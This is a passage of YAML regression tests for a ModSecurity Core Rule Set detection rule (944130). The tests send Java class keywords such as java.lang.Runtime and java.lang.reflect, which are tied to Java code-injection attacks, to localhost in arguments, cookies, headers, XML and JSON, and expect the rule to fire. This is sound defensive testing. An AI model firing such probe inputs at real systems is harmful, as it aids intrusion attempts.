"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.reflect" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-339 - desc: "Content-Type application/json arg value includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.reflect\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-340 - desc: "Content-Type application/json arg name includes keyword java.lang.reflect" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.reflect\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-341 - desc: "Argument test includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-342 - desc: "Argument name includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-343 - desc: "Cookie test includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Runtime - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-344 - desc: "Cookie name includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Runtime=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-345 - desc: "Request header test includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Runtime - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-346 - desc: "XML attribute value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-347 - desc: "XML element value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-348 - desc: "Nested XML element value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-349 - desc: "Content-Type text/plain includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.Runtime" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-350 - desc: "Content-Type application/json arg value includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.Runtime\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-351 - desc: "Content-Type application/json arg name includes keyword java.lang.Runtime" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.Runtime\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-352 - desc: "Argument test includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-353 - desc: "Argument name includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.String=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-354 - desc: "Cookie test includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.String - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-355 - desc: "Cookie name includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.String=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-356 - desc: "Request header test includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.String - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-357 - desc: "XML attribute value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-358 - desc: "XML element value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-359 - desc: "Nested XML element value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-360 - desc: "Content-Type text/plain includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.String" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-361 - desc: "Content-Type application/json arg value includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.String\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-362 - desc: "Content-Type application/json arg name includes keyword java.lang.String" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.String\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-363 - desc: "Argument test includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-364 - desc: "Argument name includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.StringBuilder=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-365 - desc: "Cookie test includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.StringBuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-366 - desc: "Cookie name includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.StringBuilder=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-367 - desc: "Request header test includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.StringBuilder - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-368 - desc: "XML attribute value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-369 - desc: "XML element value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-370 - desc: "Nested XML element value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-371 - desc: "Content-Type text/plain includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.StringBuilder" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-372 - desc: "Content-Type application/json arg value includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.StringBuilder\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-373 - desc: "Content-Type application/json arg name includes keyword java.lang.StringBuilder" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"java.lang.StringBuilder\": \"test\"}" - output: - log_contains: "id \"944130\"" - - - test_title: 944130-374 - desc: "Argument test includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-375 - desc: "Argument name includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.System=test" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-376 - desc: "Cookie test includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.System - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-377 - desc: "Cookie name includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.System=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-378 - desc: "Request header test includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.System - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-379 - desc: "XML attribute value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-380 - desc: "XML element value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-381 - desc: "Nested XML element value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-382 - desc: "Content-Type text/plain includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=java.lang.System" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-383 - desc: "Content-Type application/json arg value includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"java.lang.System\"}" - output: - log_contains: "id \"944130\"" - - - - test_title: 944130-384 - desc: "Content-Type application/json arg name includes keyword java.lang.System" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 